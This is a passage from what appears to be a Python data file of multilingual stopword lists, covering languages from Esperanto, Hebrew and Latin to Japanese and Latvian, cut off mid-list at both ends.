"je",u"jes",u"k",u"kaj",u"ke",u"kio",u"kion",u"kiu",u"kiujn",u"kiun",u"kvankam",u"kvar",u"kvara",u"kvazaŭ",u"kvin",u"kvina",u"la",u"li",u"lia",u"lian",u"lin",u"malantaŭ",u"male",u"malgraŭ",u"mem",u"mi",u"mia",u"mian",u"min",u"minus",u"naŭ",u"naŭa",u"ne",u"nek",u"nenio",u"nenion",u"neniu",u"neniun",u"nepre",u"ni",u"nia",u"nian",u"nin",u"nu",u"nun",u"nur",u"ok",u"oka",u"oni",u"onia",u"onian",u"onin",u"plej",u"pli",u"plu",u"plus",u"por",u"post",u"preter",u"s-no",u"s-ro",u"se",u"sed",u"sep",u"sepa",u"ses",u"sesa",u"si",u"sia",u"sian",u"sin",u"sinjor'",u"sinjorino",u"sinjoro",u"sub",u"super",u"supren",u"sur",u"tamen",u"tio",u"tion",u"tiu",u"tiujn",u"tiun",u"tra",u"tri",u"tria",u"tuj",u"tute",u"unu",u"unua",u"ve",u"verŝajne",u"vi",u"via",u"vian",u"vin",u"ĉi",u"ĉio",u"ĉion",u"ĉiu",u"ĉiujn",u"ĉiun",u"ĉu",u"ĝi",u"ĝia",u"ĝian",u"ĝin",u"ĝis",u"ĵus",u"ŝi",u"ŝia",u"ŝin"],u"he":[u"אבל",u"או",u"אולי",u"אותה",u"אותו",u"אותי",u"אותך",u"אותם",u"אותן",u"אותנו",u"אז",u"אחר",u"אחרות",u"אחרי",u"אחריכן",u"אחרים",u"אחרת",u"אי",u"איזה",u"איך",u"אין",u"איפה",u"איתה",u"איתו",u"איתי",u"איתך",u"איתכם",u"איתכן",u"איתם",u"איתן",u"איתנו",u"אך",u"אל",u"אלה",u"אלו",u"אם",u"אנחנו",u"אני",u"אס",u"אף",u"אצל",u"אשר",u"את",u"אתה",u"אתכם",u"אתכן",u"אתם",u"אתן",u"באיזומידה",u"באמצע",u"באמצעות",u"בגלל",u"בין",u"בלי",u"במידה",u"במקוםשבו",u"ברם",u"בשביל",u"בשעהש",u"בתוך",u"גם",u"דרך",u"הוא",u"היא",u"היה",u"היכן",u"היתה",u"היתי",u"הם",u"הן",u"הנה",u"הסיבהשבגללה",u"הרי",u"ואילו",u"ואת",u"זאת",u"זה",u"זות",u"יהיה",u"יוכל",u"יוכלו",u"יותרמדי",u"יכול",u"יכולה",u"יכולות",u"יכולים",u"יכל",u"יכלה",u"יכלו",u"יש",u"כאן",u"כאשר",u"כולם",u"כולן",u"כזה",u"כי",u"כיצד",u"כך",u"ככה",u"כל",u"כלל",u"כמו",u"כן",u"כפי",u"כש",u"לא",u"לאו",u"לאיזותכלית",u"לאן",u"לבין",u"לה",u"להיות",u"להם",u"להן",u"לו",u"לי",u"לכם",u"לכן",u"למה",u"למטה",u"למעלה",u"למקוםשבו",u"למרות",u"לנו",u"לעבר",u"לעיכן",u"לפיכך",u"לפני",u"מאד",u"מאחורי",u"מאיזוסיבה",u"מאין",u"מאיפה",u"מבלי",u"מבעד",u"מדוע",u"מה",u"מהיכן",u"מול",u"מחוץ",u"מי",u"מכאן",u"מכיוון",u"מלבד",u"מן",u"מנין",u"מסוגל",u"מעט",u"מעטים",u"מעל",u"מצד",u"מקוםבו",u"מתחת",u"מתי",u"נגד",u"נגר",u"נו",u"עד",u"עז",u"על",u"עלי",u"עליה",u"עליהם",u"עליהן",u"עליו",u"עליך",u"עליכם",u"עלינו",u"עם",u"עצמה",u"עצמהם",u"עצמהן",u"עצמו",u"עצמי",u"עצמם",u"עצמן",u"עצמנו",u"פה",u"רק",u"שוב",u"של",u"שלה",u"שלהם",u"שלהן",u"שלו",u"שלי",u"שלך",u"שלכה",u"שלכם",u"שלכן",u"שלנו",u"שם",u"תהיה",u"תחת"],u"la":[u"a",u"ab",u"ac",u"ad",u"at",u"atque",u"aut",u"autem",u"cum",u"de",u"dum",u"e",u"erant",u"erat",u"est",u"et",u"etiam",u"ex",u"haec",u"hic",u"hoc",u"in",u"ita",u"me",u"nec",u"neque",u"non",u"per",u"qua",u"quae",u"quam",u"qui",u"quibus",u"quidem",u"quo",u"quod",u"re",u"rebus",u"rem",u"res",u"sed",u"si",u"sic",u"sunt",u"tamen",u
"tandem",u"te",u"ut",u"vel"],u"sk":[u"a",u"aby",u"aj",u"ako",u"aký",u"ale",u"alebo",u"ani",u"avšak",u"ba",u"bez",u"buï",u"cez",u"do",u"ho",u"hoci",u"i",u"ich",u"im",u"ja",u"jeho",u"jej",u"jemu",u"ju",u"k",u"kam",u"kde",u"kedže",u"keï",u"kto",u"ktorý",u"ku",u"lebo",u"ma",u"mi",u"mne",u"mnou",u"mu",u"my",u"mòa",u"môj",u"na",u"nad",u"nami",u"neho",u"nej",u"nemu",u"nich",u"nielen",u"nim",u"no",u"nám",u"nás",u"náš",u"ním",u"o",u"od",u"on",u"ona",u"oni",u"ono",u"ony",u"po",u"pod",u"pre",u"pred",u"pri",u"s",u"sa",u"seba",u"sem",u"so",u"svoj",u"taký",u"tam",u"teba",u"tebe",u"tebou",u"tej",u"ten",u"ti",u"tie",u"to",u"toho",u"tomu",u"tou",u"tvoj",u"ty",u"tá",u"tým",u"v",u"vami",u"veï",u"vo",u"vy",u"vám",u"vás",u"váš",u"však",u"z",u"za",u"zo",u"a",u"èi",u"èo",u"èí",u"òom",u"òou",u"òu",u"že"],u"sl":[u"a",u"ali",u"april",u"avgust",u"b",u"bi",u"bil",u"bila",u"bile",u"bili",u"bilo",u"biti",u"blizu",u"bo",u"bodo",u"bojo",u"bolj",u"bom",u"bomo",u"boste",u"bova",u"boš",u"brez",u"c",u"cel",u"cela",u"celi",u"celo",u"d",u"da",u"daleč",u"dan",u"danes",u"datum",u"december",u"deset",u"deseta",u"deseti",u"deseto",u"devet",u"deveta",u"deveti",u"deveto",u"do",u"dober",u"dobra",u"dobri",u"dobro",u"dokler",u"dol",u"dolg",u"dolga",u"dolgi",u"dovolj",u"drug",u"druga",u"drugi",u"drugo",u"dva",u"dve",u"e",u"eden",u"en",u"ena",u"ene",u"eni",u"enkrat",u"eno",u"etc.",u"f",u"februar",u"g",u"g.",u"ga",u"ga.",u"gor",u"gospa",u"gospod",u"h",u"halo",u"i",u"idr.",u"ii",u"iii",u"in",u"iv",u"ix",u"iz",u"j",u"januar",u"jaz",u"je",u"ji",u"jih",u"jim",u"jo",u"julij",u"junij",u"jutri",u"k",u"kadarkoli",u"kaj",u"kajti",u"kako",u"kakor",u"kamor",u"kamorkoli",u"kar",u"karkoli",u"katerikoli",u"kdaj",u"kdo",u"kdorkoli",u"ker",u"ki",u"kje",u"kjer",u"kjerkoli",u"ko",u"koder",u"koderkoli",u"koga",u"komu",u"kot",u"kratek",u"kratka",u"kratke",u"kratki",u"l",u"lahka",u"lahke",u"lahki",u"lahko",u"le",u"lep",u"lepa",u"lepe",u"lepi",u"lepo",u"leto",u"m",u"maj",u"majhen",u"majhna",u"majhni",u"malce",u"malo",u"manj",u"marec",u"me",u"med",u"medtem",u"mene",u"mesec",u"mi",u"midva",u"midve",u"mnogo",u"moj",u"moja",u"moje",u"mora",u"morajo",u"moram",u"moramo",u"morate",u"moraš",u"morem",u"mu",u"n",u"na",u"nad",u"naj",u"najina",u"najino",u"najmanj",u"naju",u"največ",u"nam",u"narobe",u"nas",u"nato",u"nazaj",u"naš",u"naša",u"naše",u"ne",u"nedavno",u"nedelja",u"nek",u"neka",u"nekaj",u"nekatere",u"nekateri",u"nekatero",u"nekdo",u"neke",u"nekega",u"neki",u"nekje",u"neko",u"nekoga",u"nekoč",u"ni",u"nikamor",u"nikdar",u"nikjer",u"nikoli",u"nič",u"nje",u"njega",u"njegov",u"njegova",u"njegovo",u"njej",u"njemu",u"njen",u"njena",u"njeno",u"nji",u"njih",u"njihov",u"njihova",u"njihovo",u"njiju",u"njim",u"njo",u"njun",u"njuna",u"njuno",u"no",u"nocoj",u"november",u"npr.",u"o",u"ob",u"oba",u"obe",u"oboje",u"od",u"odprt",u"odprta",u"odprti",u"okoli",u"oktober",u"on",u"onadva",u"one",u"oni",u"onidve",u"osem",u"osma",u"osmi",u"osmo",u"oz.",u"p",u"pa",u"pet",u"peta",u"petek",u"peti",u"peto",u"po",u"pod",u"pogosto",u"poleg",u"poln",u"polna",u"polni",u"polno",u"ponavadi",u"ponedeljek",u"ponovno",u"potem",u"povsod",u"pozdravljen",u"pozdravljeni",u"prav",u"prava",u"prave",u"pravi",u"pravo",u"prazen",u"prazna",u"prazno",u"prbl.",u"precej",u"pred",u"prej",u"preko",u"pri",u"pribl.",u"približno",u"primer",u"pripravljen",u"pripravljena",u"pripravljeni",u"proti",u"prva",u"prvi",u"prvo",u"r",u"ravno",u"redko",u"res",u"reč",u"s",u"saj",u"sam",u"sama",u"same",u"sami",u"samo",u"se",u"sebe",u"sebi",u"sedaj",u"sedem",u"sedma",u"sedmi",u"sedmo",u"sem",u"september",u"seveda",u"si",u"sicer",u"sko
raj",u"skozi",u"slab",u"smo",u"so",u"sobota",u"spet",u"sreda",u"srednja",u"srednji",u"sta",u"ste",u"stran",u"stvar",u"sva",u"t",u"ta",u"tak",u"taka",u"take",u"taki",u"tako",u"takoj",u"tam",u"te",u"tebe",u"tebi",u"tega",u"težak",u"težka",u"težki",u"težko",u"ti",u"tista",u"tiste",u"tisti",u"tisto",u"tj.",u"tja",u"to",u"toda",u"torek",u"tretja",u"tretje",u"tretji",u"tri",u"tu",u"tudi",u"tukaj",u"tvoj",u"tvoja",u"tvoje",u"u",u"v",u"vaju",u"vam",u"vas",u"vaš",u"vaša",u"vaše",u"ve",u"vedno",u"velik",u"velika",u"veliki",u"veliko",u"vendar",u"ves",u"več",u"vi",u"vidva",u"vii",u"viii",u"visok",u"visoka",u"visoke",u"visoki",u"vsa",u"vsaj",u"vsak",u"vsaka",u"vsakdo",u"vsake",u"vsaki",u"vsakomur",u"vse",u"vsega",u"vsi",u"vso",u"včasih",u"včeraj",u"x",u"z",u"za",u"zadaj",u"zadnji",u"zakaj",u"zaprta",u"zaprti",u"zaprto",u"zdaj",u"zelo",u"zunaj",u"č",u"če",u"često",u"četrta",u"četrtek",u"četrti",u"četrto",u"čez",u"čigav",u"š",u"šest",u"šesta",u"šesti",u"šesto",u"štiri",u"ž",u"že"],u"br":[u"a",u"ainda",u"alem",u"ambas",u"ambos",u"antes",u"ao",u"aonde",u"aos",u"apos",u"aquele",u"aqueles",u"as",u"assim",u"com",u"como",u"contra",u"contudo",u"cuja",u"cujas",u"cujo",u"cujos",u"da",u"das",u"de",u"dela",u"dele",u"deles",u"demais",u"depois",u"desde",u"desta",u"deste",u"dispoe",u"dispoem",u"diversa",u"diversas",u"diversos",u"do",u"dos",u"durante",u"e",u"ela",u"elas",u"ele",u"eles",u"em",u"entao",u"entre",u"essa",u"essas",u"esse",u"esses",u"esta",u"estas",u"este",u"estes",u"ha",u"isso",u"isto",u"logo",u"mais",u"mas",u"mediante",u"menos",u"mesma",u"mesmas",u"mesmo",u"mesmos",u"na",u"nao",u"nas",u"nem",u"nesse",u"neste",u"nos",u"o",u"os",u"ou",u"outra",u"outras",u"outro",u"outros",u"pelas",u"pelo",u"pelos",u"perante",u"pois",u"por",u"porque",u"portanto",u"propios",u"proprio",u"quais",u"qual",u"qualquer",u"quando",u"quanto",u"que",u"quem",u"quer",u"se",u"seja",u"sem",u"sendo",u"seu",u"seus",u"sob",u"sobre",u"sua",u"suas",u"tal",u"tambem",u"teu",u"teus",u"toda",u"todas",u"todo",u"todos",u"tua",u"tuas",u"tudo",u"um",u"uma",u"umas",u"uns"],u"ca":[u"a",u"abans",u"ací",u"ah",u"així",u"això",u"al",u"aleshores",u"algun",u"alguna",u"algunes",u"alguns",u"alhora",u"allà",u"allí",u"allò",u"als",u"altra",u"altre",u"altres",u"amb",u"ambdues",u"ambdós",u"apa",u"aquell",u"aquella",u"aquelles",u"aquells",u"aquest",u"aquesta",u"aquestes",u"aquests",u"aquí",u"baix",u"cada",u"cadascuna",u"cadascunes",u"cadascuns",u"cadascú",u"com",u"contra",u"d'un",u"d'una",u"d'unes",u"d'uns",u"dalt",u"de",u"del",u"dels",u"des",u"després",u"dins",u"dintre",u"donat",u"doncs",u"durant",u"e",u"eh",u"el",u"els",u"em",u"en",u"encara",u"ens",u"entre",u"eren",u"es",u"esta",u"estaven",u"esteu",u"està",u"estàvem",u"estàveu",u"et",u"etc",u"ets",u"fins",u"fora",u"gairebé",u"ha",u"han",u"has",u"havia",u"he",u"hem",u"heu",u"hi",u"ho",u"i",u"igual",u"iguals",u"ja",u"l'hi",u"la",u"les",u"li",u"li'n",u"llavors",u"m'he",u"ma",u"mal",u"malgrat",u"mateix",u"mateixa",u"mateixes",u"mateixos",u"me",u"mentre",u"meu",u"meus",u"meva",u"meves",u"molt",u"molta",u"moltes",u"molts",u"mon",u"mons",u"més",u"n'he",u"n'hi",u"ne",u"ni",u"no",u"nogensmenys",u"només",u"nosaltres",u"nostra",u"nostre",u"nostres",u"o",u"oh",u"oi",u"on",u"pas",u"pel",u"pels",u"per",u"perquè",u"però",u"poc",u"poca",u"pocs",u"poques",u"potser",u"propi",u"qual",u"quals",u"quan",u"quant",u"que",u"quelcom",u"qui",u"quin",u"quina",u"quines",u"quins",u"què",u"s'ha",u"s'han",u"sa",u"semblant",u"semblants",u"ses",u"seu",u"seus",u"seva",u"seves",u"si",u"sobre",u"sobretot",u"solament",u"sols",u"son",u"sons",u"sota",u"sou
",u"sóc",u"són",u"t'ha",u"t'han",u"t'he",u"ta",u"tal",u"també",u"tampoc",u"tan",u"tant",u"tanta",u"tantes",u"teu",u"teus",u"teva",u"teves",u"ton",u"tons",u"tot",u"tota",u"totes",u"tots",u"un",u"una",u"unes",u"uns",u"us",u"va",u"vaig",u"vam",u"van",u"vas",u"veu",u"vosaltres",u"vostra",u"vostre",u"vostres",u"érem",u"éreu",u"és"],u"cs":[u"a",u"aby",u"ahoj",u"aj",u"ale",u"anebo",u"ani",u"ano",u"asi",u"aspoň",u"atd",u"atp",u"ačkoli",u"až",u"bez",u"beze",u"blízko",u"bohužel",u"brzo",u"bude",u"budem",u"budeme",u"budete",u"budeš",u"budou",u"budu",u"by",u"byl",u"byla",u"byli",u"bylo",u"byly",u"bys",u"být",u"během",u"chce",u"chceme",u"chcete",u"chceš",u"chci",u"chtít",u"chtějí",u"chut'",u"chuti",u"co",u"což",u"cz",u"daleko",u"další",u"den",u"deset",u"devatenáct",u"devět",u"dnes",u"do",u"dobrý",u"docela",u"dva",u"dvacet",u"dvanáct",u"dvě",u"dál",u"dále",u"děkovat",u"děkujeme",u"děkuji",u"ho",u"hodně",u"i",u"jak",u"jakmile",u"jako",u"jakož",u"jde",u"je",u"jeden",u"jedenáct",u"jedna",u"jedno",u"jednou",u"jedou",u"jeho",u"jehož",u"jej",u"jejich",u"její",u"jelikož",u"jemu",u"jen",u"jenom",u"jestli",u"jestliže",u"ještě",u"jež",u"ji",u"jich",u"jimi",u"jinak",u"jiné",u"již",u"jsem",u"jseš",u"jsi",u"jsme",u"jsou",u"jste",u"já",u"jí",u"jím",u"jíž",u"k",u"kam",u"kde",u"kdo",u"kdy",u"když",u"ke",u"kolik",u"kromě",u"kterou",u"která",u"které",u"který",u"kteří",u"kvůli",u"mají",u"mezi",u"mi",u"mne",u"mnou",u"mně",u"moc",u"mohl",u"mohou",u"moje",u"moji",u"možná",u"musí",u"my",u"má",u"málo",u"mám",u"máme",u"máte",u"máš",u"mé",u"mí",u"mít",u"mě",u"můj",u"může",u"na",u"nad",u"nade",u"napište",u"naproti",u"načež",u"naše",u"naši",u"ne",u"nebo",u"nebyl",u"nebyla",u"nebyli",u"nebyly",u"nedělají",u"nedělá",u"nedělám",u"neděláme",u"neděláte",u"neděláš",u"neg",u"nejsi",u"nejsou",u"nemají",u"nemáme",u"nemáte",u"neměl",u"není",u"nestačí",u"nevadí",u"než",u"nic",u"nich",u"nimi",u"nové",u"nový",u"nula",u"nám",u"námi",u"nás",u"náš",u"ním",u"ně",u"něco",u"nějak",u"někde",u"někdo",u"němu",u"němuž",u"o",u"od",u"ode",u"on",u"ona",u"oni",u"ono",u"ony",u"osm",u"osmnáct",u"pak",u"patnáct",u"po",u"pod",u"podle",u"pokud",u"potom",u"pouze",u"pozdě",u"pořád",u"pravé",u"pro",u"prostě",u"prosím",u"proti",u"proto",u"protože",u"proč",u"první",u"pta",u"pět",u"před",u"přes",u"přese",u"při",u"přičemž",u"re",u"rovně",u"s",u"se",u"sedm",u"sedmnáct",u"si",u"skoro",u"smí",u"smějí",u"snad",u"spolu",u"sta",u"sto",u"strana",u"sté",u"své",u"svých",u"svým",u"svými",u"ta",u"tady",u"tak",u"takhle",u"taky",u"také",u"takže",u"tam",u"tamhle",u"tamhleto",u"tamto",u"tato",u"tebe",u"tebou",u"ted'",u"tedy",u"ten",u"tento",u"teto",u"ti",u"tipy",u"tisíc",u"tisíce",u"to",u"tobě",u"tohle",u"toho",u"tohoto",u"tom",u"tomto",u"tomu",u"tomuto",u"toto",u"trošku",u"tu",u"tuto",u"tvoje",u"tvá",u"tvé",u"tvůj",u"ty",u"tyto",u"téma",u"tím",u"tímto",u"tě",u"těm",u"těmu",u"třeba",u"tři",u"třináct",u"u",u"určitě",u"už",u"v",u"vaše",u"vaši",u"ve",u"vedle",u"večer",u"vlastně",u"vy",u"vám",u"vámi",u"vás",u"váš",u"více",u"však",u"všechno",u"všichni",u"vůbec",u"vždy",u"z",u"za",u"zatímco",u"zač",u"zda",u"zde",u"ze",u"zprávy",u"zpět",u"čau",u"či",u"článku",u"články",u"čtrnáct",u"čtyři",u"šest",u"šestnáct",u"že"],u"el":[u"αλλα",u"αν",u"αντι",u"απο",u"αυτα",u"αυτεσ",u"αυτη",u"αυτο",u"αυτοι",u"αυτοσ",u"αυτουσ",u"αυτων",u"για",u"δε",u"δεν",u"εαν",u"ειμαι",u"ειμαστε",u"ειναι",u"εισαι",u"ειστε",u"εκεινα",u"εκεινεσ",u"εκεινη",u"εκεινο",u"εκεινοι",u"εκεινοσ",u"εκεινουσ",u"εκεινων",u"ενω",u"επι",u"η",u"θα",u"ισωσ",u"κ",u"και",u"κατα",u"κι",u"μα",u"με",u"μετα",u"μη",u"μην",u"να",u"ο",u"οι",u"ομωσ",
u"οπωσ",u"οσο",u"οτι",u"παρα",u"ποια",u"ποιεσ",u"ποιο",u"ποιοι",u"ποιοσ",u"ποιουσ",u"ποιων",u"που",u"προσ",u"πωσ",u"σε",u"στη",u"στην",u"στο",u"στον",u"τα",u"την",u"τησ",u"το",u"τον",u"τοτε",u"του",u"των",u"ωσ"],u"eu":[u"al",u"anitz",u"arabera",u"asko",u"baina",u"bat",u"batean",u"batek",u"bati",u"batzuei",u"batzuek",u"batzuetan",u"batzuk",u"bera",u"beraiek",u"berau",u"berauek",u"bere",u"berori",u"beroriek",u"beste",u"bezala",u"da",u"dago",u"dira",u"ditu",u"du",u"dute",u"edo",u"egin",u"ere",u"eta",u"eurak",u"ez",u"gainera",u"gu",u"gutxi",u"guzti",u"haiei",u"haiek",u"haietan",u"hainbeste",u"hala",u"han",u"handik",u"hango",u"hara",u"hari",u"hark",u"hartan",u"hau",u"hauei",u"hauek",u"hauetan",u"hemen",u"hemendik",u"hemengo",u"hi",u"hona",u"honek",u"honela",u"honetan",u"honi",u"hor",u"hori",u"horiei",u"horiek",u"horietan",u"horko",u"horra",u"horrek",u"horrela",u"horretan",u"horri",u"hortik",u"hura",u"izan",u"ni",u"noiz",u"nola",u"non",u"nondik",u"nongo",u"nor",u"nora",u"ze",u"zein",u"zen",u"zenbait",u"zenbat",u"zer",u"zergatik",u"ziren",u"zituen",u"zu",u"zuek",u"zuen",u"zuten"],u"ga":[u"a",u"ach",u"ag",u"agus",u"an",u"aon",u"ar",u"arna",u"as",u"b'",u"ba",u"beirt",u"bhúr",u"caoga",u"ceathair",u"ceathrar",u"chomh",u"chtó",u"chuig",u"chun",u"cois",u"céad",u"cúig",u"cúigear",u"d'",u"daichead",u"dar",u"de",u"deich",u"deichniúr",u"den",u"dhá",u"do",u"don",u"dtí",u"dá",u"dár",u"dó",u"faoi",u"faoin",u"faoina",u"faoinár",u"fara",u"fiche",u"gach",u"gan",u"go",u"gur",u"haon",u"hocht",u"i",u"iad",u"idir",u"in",u"ina",u"ins",u"inár",u"is",u"le",u"leis",u"lena",u"lenár",u"m'",u"mar",u"mo",u"mé",u"na",u"nach",u"naoi",u"naonúr",u"ná",u"ní",u"níor",u"nó",u"nócha",u"ocht",u"ochtar",u"os",u"roimh",u"sa",u"seacht",u"seachtar",u"seachtó",u"seasca",u"seisear",u"siad",u"sibh",u"sinn",u"sna",u"sé",u"sí",u"tar",u"thar",u"thú",u"triúr",u"trí",u"trína",u"trínár",u"tríocha",u"tú",u"um",u"ár",u"é",u"éis",u"í",u"ó",u"ón",u"óna",u"ónár"],u"gl":[u"a",u"alí",u"ao",u"aos",u"aquel",u"aquela",u"aquelas",u"aqueles",u"aquilo",u"aquí",u"as",u"así",u"aínda",u"ben",u"cando",u"che",u"co",u"coa",u"coas",u"comigo",u"con",u"connosco",u"contigo",u"convosco",u"cos",u"cun",u"cunha",u"cunhas",u"cuns",u"da",u"dalgunha",u"dalgunhas",u"dalgún",u"dalgúns",u"das",u"de",u"del",u"dela",u"delas",u"deles",u"desde",u"deste",u"do",u"dos",u"dun",u"dunha",u"dunhas",u"duns",u"e",u"el",u"ela",u"elas",u"eles",u"en",u"era",u"eran",u"esa",u"esas",u"ese",u"eses",u"esta",u"estaba",u"estar",u"este",u"estes",u"estiven",u"estou",u"está",u"están",u"eu",u"facer",u"foi",u"foron",u"fun",u"había",u"hai",u"iso",u"isto",u"la",u"las",u"lle",u"lles",u"lo",u"los",u"mais",u"me",u"meu",u"meus",u"min",u"miña",u"miñas",u"moi",u"na",u"nas",u"neste",u"nin",u"no",u"non",u"nos",u"nosa",u"nosas",u"noso",u"nosos",u"nun",u"nunha",u"nunhas",u"nuns",u"nós",u"o",u"os",u"ou",u"para",u"pero",u"pode",u"pois",u"pola",u"polas",u"polo",u"polos",u"por",u"que",u"se",u"senón",u"ser",u"seu",u"seus",u"sexa",u"sido",u"sobre",u"súa",u"súas",u"tamén",u"tan",u"te",u"ten",u"ter",u"teu",u"teus",u"teñen",u"teño",u"ti",u"tido",u"tiven",u"tiña",u"túa",u"túas",u"un",u"unha",u"unhas",u"uns",u"vos",u"vosa",u"vosas",u"voso",u"vosos",u"vós",u"á",u"é",u"ó",u"ós"],u"hy":[u"այդ",u"այլ",u"այն",u"այս",u"դու",u"դուք",u"եմ",u"են",u"ենք",u"ես",u"եք",u"է",u"էի",u"էին",u"էինք",u"էիր",u"էիք",u"էր",u"ըստ",u"թ",u"ի",u"ին",u"իսկ",u"իր",u"կամ",u"համար",u"հետ",u"հետո",u"մենք",u"մեջ",u"մի",u"ն",u"նա",u"նաև",u"նրա",u"նրանք",u"որ",u"որը",u"որոնք",u"որպես",u"ու",u"ում",u"պիտի",u"վրա",u"և"],u"id":[u"ada",u"adalah",u"adanya",u"adapun",
u"agak",u"agaknya",u"agar",u"akan",u"akankah",u"akhirnya",u"aku",u"akulah",u"amat",u"amatlah",u"anda",u"andalah",u"antar",u"antara",u"antaranya",u"apa",u"apaan",u"apabila",u"apakah",u"apalagi",u"apatah",u"atau",u"ataukah",u"ataupun",u"bagai",u"bagaikan",u"bagaimana",u"bagaimanakah",u"bagaimanapun",u"bagi",u"bahkan",u"bahwa",u"bahwasanya",u"banyak",u"beberapa",u"begini",u"beginian",u"beginikah",u"beginilah",u"begitu",u"begitukah",u"begitulah",u"begitupun",u"belum",u"belumlah",u"berapa",u"berapakah",u"berapalah",u"berapapun",u"bermacam",u"bersama",u"betulkah",u"biasa",u"biasanya",u"bila",u"bilakah",u"bisa",u"bisakah",u"boleh",u"bolehkah",u"bolehlah",u"buat",u"bukan",u"bukankah",u"bukanlah",u"bukannya",u"cuma",u"dahulu",u"dalam",u"dan",u"dapat",u"dari",u"daripada",u"dekat",u"demi",u"demikian",u"demikianlah",u"dengan",u"depan",u"di",u"dia",u"dialah",u"diantara",u"diantaranya",u"dikarenakan",u"dini",u"diri",u"dirinya",u"disini",u"disinilah",u"dong",u"dulu",u"enggak",u"enggaknya",u"entah",u"entahlah",u"hal",u"hampir",u"hanya",u"hanyalah",u"harus",u"haruslah",u"harusnya",u"hendak",u"hendaklah",u"hendaknya",u"hingga",u"ia",u"ialah",u"ibarat",u"ingin",u"inginkah",u"inginkan",u"ini",u"inikah",u"inilah",u"itu",u"itukah",u"itulah",u"jangan",u"jangankan",u"janganlah",u"jika",u"jikalau",u"juga",u"justru",u"kala",u"kalau",u"kalaulah",u"kalaupun",u"kalian",u"kami",u"kamilah",u"kamu",u"kamulah",u"kan",u"kapan",u"kapankah",u"kapanpun",u"karena",u"karenanya",u"ke",u"kecil",u"kemudian",u"kenapa",u"kepada",u"kepadanya",u"ketika",u"khususnya",u"kini",u"kinilah",u"kiranya",u"kita",u"kitalah",u"kok",u"lagi",u"lagian",u"lah",u"lain",u"lainnya",u"lalu",u"lama",u"lamanya",u"lebih",u"macam",u"maka",u"makanya",u"makin",u"malah",u"malahan",u"mampu",u"mampukah",u"mana",u"manakala",u"manalagi",u"masih",u"masihkah",u"masing",u"mau",u"maupun",u"melainkan",u"melalui",u"memang",u"mengapa",u"mereka",u"merekalah",u"merupakan",u"meski",u"meskipun",u"mungkin",u"mungkinkah",u"nah",u"namun",u"nanti",u"nantinya",u"nyaris",u"oleh",u"olehnya",u"pada",u"padahal",u"padanya",u"paling",u"pantas",u"para",u"pasti",u"pastilah",u"per",u"percuma",u"pernah",u"pula",u"pun",u"rupanya",u"saat",u"saatnya",u"saja",u"sajalah",u"saling",u"sama",u"sambil",u"sampai",u"sana",u"sangat",u"sangatlah",u"saya",u"sayalah",u"se",u"sebab",u"sebabnya",u"sebagai",u"sebagaimana",u"sebagainya",u"sebaliknya",u"sebanyak",u"sebegini",u"sebegitu",u"sebelum",u"sebelumnya",u"sebenarnya",u"seberapa",u"sebetulnya",u"sebisanya",u"sebuah",u"sedang",u"sedangkan",u"sedemikian",u"sedikit",u"sedikitnya",u"segala",u"segalanya",u"segera",u"seharusnya",u"sehingga",u"sejak",u"sejenak",u"sekali",u"sekalian",u"sekaligus",u"sekalipun",u"sekarang",u"seketika",u"sekiranya",u"sekitar",u"sekitarnya",u"sela",u"selagi",u"selain",u"selaku",u"selalu",u"selama",u"selamanya",u"seluruh",u"seluruhnya",u"semacam",u"semakin",u"semasih",u"semaunya",u"sementara",u"sempat",u"semua",u"semuanya",u"semula",u"sendiri",u"sendirinya",u"seolah",u"seorang",u"sepanjang",u"sepantasnya",u"sepantasnyalah",u"seperti",u"sepertinya",u"sering",u"seringnya",u"serta",u"serupa",u"sesaat",u"sesama",u"sesegera",u"sesekali",u"seseorang",u"sesuatu",u"sesuatunya",u"sesudah",u"sesudahnya",u"setelah",u"seterusnya",u"setiap",u"setidaknya",u"sewaktu",u"siapa",u"siapakah",u"siapapun",u"sini",u"sinilah",u"suatu",u"sudah",u"sudahkah",u"sudahlah",u"supaya",u"tadi",u"tadinya",u"tak",u"tanpa",u"tapi",u"telah",u"tentang",u"tentu",u"tentulah",u"tentunya",u"terdiri",u"terhadap",u"terhadapnya",u"terlalu",u"terlebih",u"tersebut",u"tersebutla
h",u"tertentu",u"tetapi",u"tiap",u"tidak",u"tidakkah",u"tidaklah",u"toh",u"waduh",u"wah",u"wahai",u"walau",u"walaupun",u"wong",u"yaitu",u"yakni",u"yang"],u"ja":[u"あっ",u"あり",u"ある",u"い",u"いう",u"いる",u"う",u"うち",u"お",u"および",u"おり",u"か",u"かつて",u"から",u"が",u"き",u"ここ",u"こと",u"この",u"これ",u"これら",u"さ",u"さらに",u"し",u"しかし",u"する",u"ず",u"せ",u"せる",u"そして",u"その",u"その他",u"その後",u"それ",u"それぞれ",u"た",u"ただし",u"たち",u"ため",u"たり",u"だ",u"だっ",u"つ",u"て",u"で",u"でき",u"できる",u"です",u"では",u"でも",u"と",u"という",u"といった",u"とき",u"ところ",u"として",u"とともに",u"とも",u"と共に",u"な",u"ない",u"なお",u"なかっ",u"ながら",u"なく",u"なっ",u"など",u"なら",u"なり",u"なる",u"に",u"において",u"における",u"について",u"にて",u"によって",u"により",u"による",u"に対して",u"に対する",u"に関する",u"の",u"ので",u"のみ",u"は",u"ば",u"へ",u"ほか",u"ほとんど",u"ほど",u"ます",u"また",u"または",u"まで",u"も",u"もの",u"ものの",u"や",u"よう",u"より",u"ら",u"られ",u"られる",u"れ",u"れる",u"を",u"ん",u"及び",u"特に"],u"lv":[u"aiz",u"ap",u"apakš",u"apakšpus",u"ar",u"arī",u"augšpus",u"bet",u"bez",u"bija",u"biji",u"biju",u"bijām",u"bijāt",u"būs",u"būsi",u"būsiet",u"būsim",u"būt",u"būšu",u"caur",u"diemžēl",u"diezin",u"droši",u"dēļ",u"esam",u"esat",u"esi",u"esmu",u"gan",u"gar",u"iekam",u"iekams",u"iekām",u"iekāms",u"iekš",u"iekšpus",u"ik",u"ir",u"it",u"itin",u"iz",u"ja",u"jau",u"jeb",u"jebšu",u"jel",u"jo",u"jā",u"ka",u"kamēr",u"kaut",u"kolīdz",u"kopš",u"kā",u"kļuva",u"kļuvi",u"kļuvu",u"kļuvām",u"kļuvāt",u"kļūs",u"kļūsi",u"kļūsiet",u"kļūsim",u"kļūst",u"kļūstam",u"kļūstat",u"kļūsti",u"kļūstu",u"kļūt",u"kļūšu",u"labad",u"lai",u"lejpus",u"līdz",u"līdzko",u"ne",u"nebūt",u"nedz",u"nekā",u"nevis",u"nezin",u"no",u"nu",u"nē",u"otrpus",u"pa",u"par",u"pat",u"pie",u"pirms",u"pret",u"priekš",u"pār",u"pēc",u"